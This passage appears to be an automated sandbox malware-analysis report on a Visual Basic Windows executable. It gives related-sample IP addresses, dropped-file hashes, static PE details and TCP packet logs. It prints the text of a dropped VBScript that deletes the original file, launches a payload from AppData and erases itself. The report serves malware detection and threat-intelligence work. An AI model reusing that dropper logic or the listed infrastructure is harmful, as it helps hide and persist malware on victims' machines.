	SecuriteInfo.com.Linux.DownLoader.16.15940.30355	Get hash	malicious	Browse	45.77.236.135
	SecuriteInfo.com.PUA.Tool.Linux.BtcMine.2700.1790.8083	Get hash	malicious	Browse	104.238.133.105
	SecuriteInfo.com.PUA.Tool.Linux.BtcMine.2743.28638.31741	Get hash	malicious	Browse	141.164.39.23
	frj4kNTbl3.exe	Get hash	malicious	Browse	144.202.38.53
	Order EQE090.xlsx	Get hash	malicious	Browse	8.6.8.108
	sora.arm	Get hash	malicious	Browse	45.32.230.28
	D8oUzPUNCR.exe	Get hash	malicious	Browse	8.6.8.23
	g1HhCw96xh	Get hash	malicious	Browse	66.42.42.75
	nfmAUVANYA	Get hash	malicious	Browse	149.248.33.79
	P2AN3Yrtnz.exe	Get hash	malicious	Browse	144.202.38.53
	Pa4gjPt0LW.exe	Get hash	malicious	Browse	144.202.38.53
	4KGPfYWyyJ.exe	Get hash	malicious	Browse	8.6.8.23
	ppuXvHPso0.dll	Get hash	malicious	Browse	45.76.176.10
	ppuXvHPso0.dll	Get hash	malicious	Browse	45.76.176.10
	TNIZtb3HS3.exe	Get hash	malicious	Browse	144.202.76.47
	setup_x86_x64_install.exe	Get hash	malicious	Browse	144.202.76.47
MASTER-ASCzechRepublicwwwmasterczCZ	cvWFjfKtdH	Get hash	malicious	Browse	37.205.15.222
	tgduMePOh0.exe	Get hash	malicious	Browse	185.239.222.252
	RpcNs4.exe	Get hash	malicious	Browse	37.205.9.252
	8YvgZNbOUh.exe	Get hash	malicious	Browse	185.239.222.241
	NtA6ABwq75.exe	Get hash	malicious	Browse	185.239.222.244
	aFxrnP3GU4	Get hash	malicious	Browse	185.25.184.6
	zfpLjnr5P9.exe	Get hash	malicious	Browse	185.239.222.250
	lHCBcjZBib.exe	Get hash	malicious	Browse	185.239.222.241
	Cx1HKT0xhO.exe	Get hash	malicious	Browse	185.239.222.244
	2dv5TkS2qu	Get hash	malicious	Browse	37.205.15.252
	Z9GkJvygEk.exe	Get hash	malicious	Browse	185.239.222.252
	Purchase Order.exe	Get hash	malicious	Browse	178.238.47.153
	UBHfmKPqlV.exe	Get hash	malicious	Browse	185.239.222.252
	jTI7J7BCUj.exe	Get hash	malicious	Browse	185.239.222.254
	mOLAwgknt0	Get hash	malicious	Browse	37.205.15.226
	Order List.exe	Get hash	malicious	Browse	178.238.47.16
	kb5IbEJU8c	Get hash	malicious	Browse	85.118.166.155
	8wzyljMmmn	Get hash	malicious	Browse	80.79.25.108
	kung.xlsx	Get hash	malicious	Browse	178.238.47.18
	1Ptfo0FZUMT7hlK.exe	Get hash	malicious	Browse	178.238.47.21

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	destinations.xlsx	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\install.vbs Download File
Process:	C:\Users\user\Desktop\mU9H96igb3.exe
File Type:	data
Category:	modified
Size (bytes):	528
Entropy (8bit):	3.5356300796578033
Encrypted:	false
SSDEEP:	12:4D8o++ugypjBQMB3DAd9ZvFQ4lO7MJOF0M/0aimi:4Dh+SMT+9hFNOA8F0Nait
MD5:	2E07157ACD04EED9996FD7601E5D3E21
SHA1:	1CF8E3A7A14770FCB468DE21B727ACBF197AAF04
SHA-256:	58D762754316709B3F0FA11A875298A413CD5FDFA322DAA7638D93318C175FEE
SHA-512:	6A578DD250346FAF928D90B145725598AC4B984CC43EB4543390B5109A07E33797EA7602439002B993848CD8C577B0945864DADDC23CDABFEEA070458B990FE7
Malicious:	true
Preview:	W.S.c.r.i.p.t...S.l.e.e.p. .1.0.0.0...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...f.s.o...D.e.l.e.t.e.F.i.l.e. .".C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.D.e.s.k.t.o.p.\.m.U.9.H.9.6.i.g.b.3...e.x.e."...C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...R.u.n. .".c.m.d. ./.c. .".".C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.A.d.o.b.e.s.\.D.l.l.s...e.x.e.".".".,. .0...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).

C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Download File
Process:	C:\Users\user\Desktop\mU9H96igb3.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	208896
Entropy (8bit):	4.14906794472717
Encrypted:	false
SSDEEP:	1536:tTEDegofhrRAnvzYFBWigYcgkOwijQkwY+EhBKDID:tQeZpR47YeigqVX+SK8
MD5:	8777020A37B6797241A489A707B9784B
SHA1:	A1ED1029B967295F9CE5E9D219F41DC6C7FC4D1A
SHA-256:	8A45D901CAB57A1B65C32AEA2452F56436DCF01C37BDF7875838E6054F395D90
SHA-512:	0A9D13CA582DD72B4CDCE8C91A5226AEB8C70AC7A73FA5F9775C6D03753BF7EC856371F55BF5F5E38F0A1D84E375C80916E5508F89D91E7100A82C4E544174D8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Metadefender, Detection: 26%, Browse Antivirus: ReversingLabs, Detection: 24%
Joe Sandbox View:	Filename: destinations.xlsx, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i......................*..............Rich....................PE..L......R.....................P......\|.............@..........................@..............................................$...(.......&%..................................................................0... ....................................text............................... ..`.data...............................@....rsrc...&%.......0..................@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Adobes\Dlls.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\mU9H96igb3.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Adobes\logs.dat Download File
Process:	C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
File Type:	data
Category:	dropped
Size (bytes):	148
Entropy (8bit):	6.691013798377593
Encrypted:	false
SSDEEP:	3:5qkf/XzwQgv5EywfxD854QK1i5rh/YsXfGsOitgZy/EMC2n:0avzwh5w5D854fi5VYW+90gZWEMC2n
MD5:	52BD8DA216638819E4B90406FC3BEE69
SHA1:	78123C6321924C49B30D450676C9C6D1B03E8021
SHA-256:	65BFFFA1AB9AC107A5827D180F240F501DD289B8298D0E4A3A9A8758BDB98173
SHA-512:	9EEC64AC0A3A2B82727DC04C2CE15978B380C37DE05FD90FA1F6EC41ED3046EFAF82E8A7A7364CEFC0F35C5D84BC89A365E1B868EF6308DCAF44DD4083787FAD
Malicious:	false
Preview:	. \...wL...../g)a....V.D..k..-5..f..\..px..;i.....#.+....U.+...7.}.@B!=X./..R.Q..C.....::..+.9`......nt.n7[.X..h.+=i.Bc........<"+.-..E_>E.k2.,.

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	4.14906794472717
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	mU9H96igb3.exe
File size:	208896
MD5:	8777020a37b6797241a489a707b9784b
SHA1:	a1ed1029b967295f9ce5e9d219f41dc6c7fc4d1a
SHA256:	8a45d901cab57a1b65c32aea2452f56436dcf01c37bdf7875838e6054f395d90
SHA512:	0a9d13ca582dd72b4cdce8c91a5226aeb8c70ac7a73fa5f9775c6d03753bf7ec856371f55bf5f5e38f0a1d84e375c80916e5508f89d91e7100a82c4e544174d8
SSDEEP:	1536:tTEDegofhrRAnvzYFBWigYcgkOwijQkwY+EhBKDID:tQeZpR47YeigqVX+SK8
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L......R.....................P......\|.............@........

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x40137c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x52EAF782 [Fri Jan 31 01:08:18 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	5daabd92eded5d2026efd3adb9b442c0

Entrypoint Preview

Instruction
push 0040171Ch
call 00007F5CB0495DD5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
dec eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx+79h], cl
adc eax, EE6C2F36h
inc ecx
mov bh, byte ptr [ecx-19h]
and al, 3Dh
pop eax
xchg eax, edi
push 00000000h
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
nop
stosb
xlatb
add cl, byte ptr [eax+69h]
insb
bound esi, dword ptr fs:[edx+61h]
outsb
jnc 00007F5CB0495E4Fh
imul esp, dword ptr [ebp+64h], 41070036h
add ah, al
stosb
xlatb
add al, byte ptr [eax]
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
add al, 2Ch
xor dword ptr [esi+20h], ebp
fcom st(0), st(0)
movsd
inc esi
mov byte ptr [esi-18h], dh
dec ebp
adc dword ptr [edx+esi*2], 3433C456h
cmc
mov esi, DC9142B1h
inc esp
mov edx, 960E1019h
cmp cl, byte ptr [edi-53h]
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
test dword ptr [eax], 00510000h
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [edi+ecx*2+57h], dl
dec ebp
dec edi
dec esi
push esp
add byte ptr [00000F01h], cl

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2e024	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x31000	0x2526	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x230	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x10c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2d484	0x2e000	False	0.23853069803	data	4.22024266439	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x2f000	0x13ec	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x31000	0x2526	0x3000	False	0.168375651042	data	2.83539382363	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
CUSTOM	0x32c68	0x8be	MS Windows icon resource - 1 icon, 32x32	English	United States
CUSTOM	0x323aa	0x8be	MS Windows icon resource - 1 icon, 32x32	English	United States
CUSTOM	0x320ac	0x2fe	MS Windows icon resource - 1 icon, 32x32, 4 colors	English	United States
CUSTOM	0x31dae	0x2fe	MS Windows icon resource - 1 icon, 32x32, 4 colors	English	United States
CUSTOM	0x31ab0	0x2fe	MS Windows icon resource - 1 icon, 32x32, 4 colors	English	United States
RT_ICON	0x31980	0x130	data
RT_ICON	0x31698	0x2e8	data
RT_ICON	0x31570	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x31540	0x30	data
RT_VERSION	0x31260	0x2e0	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, __vbaVarIdiv, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaBoolStr, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, _adj_fpatan, __vbaLateIdCallLd, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarDup, __vbaFpI4, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0409 0x04b0
LegalCopyright	Software Inc.
InternalName	Pattes5
FileVersion	1.00
CompanyName	Unions Inc.
LegalTrademarks	Unions Software
ProductName	Unions Inc.
ProductVersion	1.00
FileDescription	Unions Inc.
OriginalFilename	Pattes5.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2021 08:38:58.565859079 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.586316109 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.586524010 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.586767912 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.606988907 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.608710051 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.608823061 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.608846903 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.608859062 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.608870983 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.608881950 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.608897924 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.608910084 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.608921051 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.608932018 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.609111071 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.609122992 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.609126091 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.609293938 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.629517078 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.629602909 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.629616022 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.629628897 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.629648924 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.629659891 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.629672050 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.629690886 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.629702091 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.629714012 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.629753113 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.629764080 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.629775047 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.629796982 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.629807949 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.629818916 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.629818916 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.629825115 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.629829884 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.629858017 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.629864931 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.629870892 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.629992008 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.630042076 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.630048037 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.630218983 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.650433064 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.650592089 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.650734901 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.650789022 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.650834084 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.650852919 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.650857925 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.650962114 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.651007891 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.651052952 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.651098013 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.651098013 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.651130915 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.651144981 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.651216984 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.651263952 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.651309967 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.651355028 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.651400089 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.651431084 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.651446104 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.651447058 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.651492119 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.651536942 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.651582956 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.651592016 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.651608944 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.651628971 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.651674032 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.651719093 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.651763916 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.651779890 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.651789904 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.651798010 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.651808977 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.651854992 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.651900053 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.651945114 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.651959896 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.651989937 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.652034998 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.652079105 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.652123928 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.652126074 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.652147055 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.652154922 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.652168989 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.652215004 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.652259111 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.652299881 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.652304888 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.652353048 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.652398109 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.652442932 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.652476072 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.652486086 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.652488947 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.652513981 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.652538061 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.652656078 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.652678967 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.652831078 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.673223972 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.673389912 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.673440933 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.673464060 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.673489094 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.673537016 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.673644066 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.673787117 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.673820019 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.673835993 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.673840046 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.673922062 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.673969984 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.674160957 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.674185991 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.674200058 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.674210072 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.674227953 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.674257994 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.674304962 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.674351931 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.674397945 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.674412966 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.674444914 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.674490929 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.674535990 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.674581051 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.674581051 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.674628973 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.674674034 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.674720049 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.674760103 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.674766064 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.674772024 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.674794912 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.674803972 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.674813032 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.674860001 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.674905062 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.674937010 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.674951077 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.674954891 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.674998045 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675043106 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675088882 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675098896 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675107956 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.675110102 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675120115 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675129890 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675138950 CEST	80	49804	83.167.224.147	192.168.11.20
